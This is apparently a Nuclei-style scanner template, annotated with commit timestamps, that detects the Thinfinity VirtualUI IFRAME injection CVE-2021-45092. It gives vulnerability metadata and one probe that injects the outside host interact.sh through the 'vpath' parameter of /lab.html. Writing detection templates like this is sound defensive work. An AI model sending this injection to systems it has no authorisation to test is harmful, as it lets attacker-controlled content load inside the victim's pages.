2021-12-18 09:02:44 +00:00
id : CVE-2021-45092
info :
name : Thinfinity Iframe Injection
author : danielmofer
2021-12-21 11:06:14 +00:00
severity : critical
2022-02-28 19:50:44 +00:00
description : A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
2021-12-18 09:02:44 +00:00
reference :
- https://github.com/cybelesoft/virtualui/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
- https://www.tenable.com/cve/CVE-2021-45092
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/166068/Thinfinity-VirtualUI-2.5.41.0-IFRAME-Injection.html
2021-12-21 11:06:14 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-12-21 11:06:14 +00:00
cve-id : CVE-2021-45092
cwe-id : CWE-74
2023-08-31 11:46:18 +00:00
epss-score : 0.05789
2023-11-03 15:51:18 +00:00
epss-percentile : 0.92544
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cybelesoft
product : thinfinity_virtualui
2023-05-11 13:27:36 +00:00
tags : packetstorm,iframe,thinfinity,tenable,cve,cve2021,injection
2021-12-18 09:02:44 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-18 09:02:44 +00:00
- method : GET
path :
2022-06-06 10:40:15 +00:00
- "{{BaseURL}}/lab.html?vpath=//interact.sh"
2021-12-18 09:02:44 +00:00
matchers :
- type : regex
regex :
- ".*vpath.*"
- "thinfinity"
2022-02-28 19:50:44 +00:00
condition : and
2023-11-03 17:10:29 +00:00
# digest: 4a0a00473045022052051e8b182718c7b15a7d78a2b758428acc2732fac312fd4393d117f5d33f1c022100e4d52d6b720f47307fccec6ff0633d5775be68a639fcdee441666dfd18ce887b:922c64590222798bb761d5b6d8e72950